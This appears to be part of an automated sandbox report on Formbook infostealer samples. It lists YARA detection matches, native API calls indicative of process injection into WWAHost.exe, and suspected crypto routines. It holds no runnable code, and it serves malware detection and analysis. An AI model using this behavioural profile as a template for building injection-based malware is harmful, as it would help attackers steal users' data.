Source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 16.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.ACre0O2rKa.exe.2a56000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.ACre0O2rKa.exe.2a56000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 20.2.5jd0x8e0uzsd8l.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 16.2.5jd0x8e0uzsd8l.exe.2c66000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.ACre0O2rKa.exe.2a56000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.ACre0O2rKa.exe.2a56000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.5jd0x8e0uzsd8l.exe.2996000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 20.2.5jd0x8e0uzsd8l.exe.2b06000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Contains functionality to call native functionsShow sources
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_02180B93 NtProtectVirtualMemory,0_2_02180B93
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_02180D4E NtSetContextThread,0_2_02180D4E
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_02180D70 NtResumeThread,0_2_02180D70
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_00416BC0 NtCreateFile,1_2_00416BC0
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_00416C70 NtReadFile,1_2_00416C70
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_00416CF0 NtClose,1_2_00416CF0
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_00416DA0 NtAllocateVirtualMemory,1_2_00416DA0
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_00416BBA NtCreateFile,1_2_00416BBA
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_00416CEA NtClose,1_2_00416CEA
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_00416D9B NtAllocateVirtualMemory,1_2_00416D9B
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA6A0 NtCreateSection,LdrInitializeThunk,1_2_06DFA6A0
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA610 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_06DFA610
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA750 NtCreateFile,LdrInitializeThunk,1_2_06DFA750
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA700 NtProtectVirtualMemory,LdrInitializeThunk,1_2_06DFA700
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA720 NtResumeThread,LdrInitializeThunk,1_2_06DFA720
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA480 NtMapViewOfSection,LdrInitializeThunk,1_2_06DFA480
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA4A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_06DFA4A0
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA410 NtQueryInformationToken,LdrInitializeThunk,1_2_06DFA410
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA5F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_06DFA5F0
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA540 NtDelayExecution,LdrInitializeThunk,1_2_06DFA540
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA560 NtQuerySystemInformation,LdrInitializeThunk,1_2_06DFA560
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA2D0 NtClose,LdrInitializeThunk,1_2_06DFA2D0
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA240 NtReadFile,LdrInitializeThunk,1_2_06DFA240
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA3E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_06DFA3E0
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA360 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_06DFA360
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA6D0 NtCreateProcessEx,1_2_06DFA6D0
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA650 NtQueueApcThread,1_2_06DFA650
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA780 NtOpenDirectoryObject,1_2_06DFA780
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA710 NtQuerySection,1_2_06DFA710
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFACE0 NtCreateMutant,1_2_06DFACE0
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA470 NtSetInformationFile,1_2_06DFA470
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFB470 NtOpenThread,1_2_06DFB470
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA460 NtOpenProcess,1_2_06DFA460
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFB410 NtOpenProcessToken,1_2_06DFB410
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA430 NtQueryVirtualMemory,1_2_06DFA430
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA5A0 NtWriteVirtualMemory,1_2_06DFA5A0
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFBD40 NtSuspendThread,1_2_06DFBD40
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA520 NtEnumerateKey,1_2_06DFA520
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA2F0 NtQueryInformationFile,1_2_06DFA2F0
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA260 NtWriteFile,1_2_06DFA260
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFBA30 NtSetContextThread,1_2_06DFBA30
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA220 NtWaitForSingleObject,1_2_06DFA220
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA3D0 NtCreateKey,1_2_06DFA3D0
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA350 NtQueryValueKey,1_2_06DFA350
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA370 NtQueryInformationProcess,1_2_06DFA370
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA310 NtEnumerateValueKey,1_2_06DFA310
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFB0B0 NtGetContextThread,1_2_06DFB0B0
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DFA800 NtSetValueKey,1_2_06DFA800
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A350 NtQueryValueKey,LdrInitializeThunk,3_2_0342A350
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A360 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_0342A360
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A310 NtEnumerateValueKey,LdrInitializeThunk,3_2_0342A310
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A3D0 NtCreateKey,LdrInitializeThunk,3_2_0342A3D0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A3E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_0342A3E0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A240 NtReadFile,LdrInitializeThunk,3_2_0342A240
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A260 NtWriteFile,LdrInitializeThunk,3_2_0342A260
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A2D0 NtClose,LdrInitializeThunk,3_2_0342A2D0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A800 NtSetValueKey,LdrInitializeThunk,3_2_0342A800
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A750 NtCreateFile,LdrInitializeThunk,3_2_0342A750
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A610 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_0342A610
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A6A0 NtCreateSection,LdrInitializeThunk,3_2_0342A6A0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A540 NtDelayExecution,LdrInitializeThunk,3_2_0342A540
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A560 NtQuerySystemInformation,LdrInitializeThunk,3_2_0342A560
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A470 NtSetInformationFile,LdrInitializeThunk,3_2_0342A470
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A410 NtQueryInformationToken,LdrInitializeThunk,3_2_0342A410
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342ACE0 NtCreateMutant,LdrInitializeThunk,3_2_0342ACE0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A480 NtMapViewOfSection,LdrInitializeThunk,3_2_0342A480
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A370 NtQueryInformationProcess,3_2_0342A370
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A220 NtWaitForSingleObject,3_2_0342A220
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342BA30 NtSetContextThread,3_2_0342BA30
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A2F0 NtQueryInformationFile,3_2_0342A2F0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342B0B0 NtGetContextThread,3_2_0342B0B0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A700 NtProtectVirtualMemory,3_2_0342A700
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A710 NtQuerySection,3_2_0342A710
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A720 NtResumeThread,3_2_0342A720
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A780 NtOpenDirectoryObject,3_2_0342A780
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A650 NtQueueApcThread,3_2_0342A650
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A6D0 NtCreateProcessEx,3_2_0342A6D0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342BD40 NtSuspendThread,3_2_0342BD40
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A520 NtEnumerateKey,3_2_0342A520
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A5F0 NtReadVirtualMemory,3_2_0342A5F0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A5A0 NtWriteVirtualMemory,3_2_0342A5A0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A460 NtOpenProcess,3_2_0342A460
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342B470 NtOpenThread,3_2_0342B470
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342B410 NtOpenProcessToken,3_2_0342B410
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A430 NtQueryVirtualMemory,3_2_0342A430
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0342A4A0 NtUnmapViewOfSection,3_2_0342A4A0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_003D6BC0 NtCreateFile,3_2_003D6BC0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_003D6C70 NtReadFile,3_2_003D6C70
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_003D6CF0 NtClose,3_2_003D6CF0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_003D6DA0 NtAllocateVirtualMemory,3_2_003D6DA0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_003D6BBA NtCreateFile,3_2_003D6BBA
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_003D6CEA NtClose,3_2_003D6CEA
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_003D6D9B NtAllocateVirtualMemory,3_2_003D6D9B
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 13_2_02AC0B93 NtProtectVirtualMemory,13_2_02AC0B93
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 13_2_02AC0D70 NtResumeThread,13_2_02AC0D70
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 13_2_02AC0D4E NtSetContextThread,13_2_02AC0D4E
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A6A0 NtCreateSection,LdrInitializeThunk,15_2_06E3A6A0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A610 NtAdjustPrivilegesToken,LdrInitializeThunk,15_2_06E3A610
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A750 NtCreateFile,LdrInitializeThunk,15_2_06E3A750
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A720 NtResumeThread,LdrInitializeThunk,15_2_06E3A720
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A700 NtProtectVirtualMemory,LdrInitializeThunk,15_2_06E3A700
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A4A0 NtUnmapViewOfSection,LdrInitializeThunk,15_2_06E3A4A0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A480 NtMapViewOfSection,LdrInitializeThunk,15_2_06E3A480
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A410 NtQueryInformationToken,LdrInitializeThunk,15_2_06E3A410
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A5F0 NtReadVirtualMemory,LdrInitializeThunk,15_2_06E3A5F0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A560 NtQuerySystemInformation,LdrInitializeThunk,15_2_06E3A560
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A540 NtDelayExecution,LdrInitializeThunk,15_2_06E3A540
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A2D0 NtClose,LdrInitializeThunk,15_2_06E3A2D0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A240 NtReadFile,LdrInitializeThunk,15_2_06E3A240
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A3E0 NtFreeVirtualMemory,LdrInitializeThunk,15_2_06E3A3E0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A360 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_06E3A360
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A6D0 NtCreateProcessEx,15_2_06E3A6D0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A650 NtQueueApcThread,15_2_06E3A650
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A780 NtOpenDirectoryObject,15_2_06E3A780
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A710 NtQuerySection,15_2_06E3A710
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3ACE0 NtCreateMutant,15_2_06E3ACE0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A460 NtOpenProcess,15_2_06E3A460
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3B470 NtOpenThread,15_2_06E3B470
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A470 NtSetInformationFile,15_2_06E3A470
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A430 NtQueryVirtualMemory,15_2_06E3A430
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3B410 NtOpenProcessToken,15_2_06E3B410
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A5A0 NtWriteVirtualMemory,15_2_06E3A5A0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3BD40 NtSuspendThread,15_2_06E3BD40
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A520 NtEnumerateKey,15_2_06E3A520
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A2F0 NtQueryInformationFile,15_2_06E3A2F0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A260 NtWriteFile,15_2_06E3A260
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A220 NtWaitForSingleObject,15_2_06E3A220
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3BA30 NtSetContextThread,15_2_06E3BA30
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A3D0 NtCreateKey,15_2_06E3A3D0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A370 NtQueryInformationProcess,15_2_06E3A370
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A350 NtQueryValueKey,15_2_06E3A350
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A310 NtEnumerateValueKey,15_2_06E3A310
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3B0B0 NtGetContextThread,15_2_06E3B0B0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_06E3A800 NtSetValueKey,15_2_06E3A800
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeCode function: 15_2_005C0B93 NtProtectVirtualMemory,15_2_005C0B93
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_004025660_2_00402566
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 0_2_004025380_2_00402538
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_004078F01_2_004078F0
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_0041B1CB1_2_0041B1CB
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_0041AB601_2_0041AB60
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_00419D481_2_00419D48
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_00419F031_2_00419F03
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E826F81_2_06E826F8
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E73E961_2_06E73E96
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E7CE661_2_06E7CE66
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DD76401_2_06DD7640
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DE5E701_2_06DE5E70
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DE4E611_2_06DE4E61
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DE66111_2_06DE6611
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E81FCE1_2_06E81FCE
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DD57901_2_06DD5790
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E727821_2_06E72782
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E817461_2_06E81746
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E744EF1_2_06E744EF
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E7DCC51_2_06E7DCC5
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E82C9A1_2_06E82C9A
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E81C9F1_2_06E81C9F
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E734901_2_06E73490
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DE547E1_2_06DE547E
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E6F42B1_2_06E6F42B
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DD14101_2_06DD1410
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DC740C1_2_06DC740C
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E61DE31_2_06E61DE3
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E7D5D21_2_06E7D5D2
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E6FDDB1_2_06E6FDDB
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E7E5811_2_06E7E581
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E5E58A1_2_06E5E58A
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DB0D401_2_06DB0D40
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E5C53F1_2_06E5C53F
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DD15301_2_06DD1530
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E825191_2_06E82519
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E71D1B1_2_06E71D1B
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E822DD1_2_06E822DD
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DD42B01_2_06DD42B0
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E81A991_2_06E81A99
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DE4A5B1_2_06DE4A5B
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DE523D1_2_06DE523D
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E70A021_2_06E70A02
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E8E2141_2_06E8E214
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DE63C21_2_06DE63C2
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DBEBE01_2_06DBEBE0
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DE4B961_2_06DE4B96
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DDFB401_2_06DDFB40
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E828E81_2_06E828E8
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DE48CB1_2_06DE48CB
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E618B61_2_06E618B6
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DCA0801_2_06DCA080
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DE10701_2_06DE1070
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DE98101_2_06DE9810
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E7D0161_2_06E7D016
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DEE0201_2_06DEE020
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DE00211_2_06DE0021
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E819E21_2_06E819E2
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E761DF1_2_06E761DF
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E8D9BE1_2_06E8D9BE
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DE61801_2_06DE6180
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DE594B1_2_06DE594B
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06DE71101_2_06DE7110
Source: C:\Users\user\Desktop\ACre0O2rKa.exeCode function: 1_2_06E099061_2_06E09906
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_0340FB403_2_0340FB40
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034163C23_2_034163C2
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_03414B963_2_03414B96
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_033EEBE03_2_033EEBE0
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_03414A5B3_2_03414A5B
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034A0A023_2_034A0A02
Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 3_2_034BE2143_2_034BE214
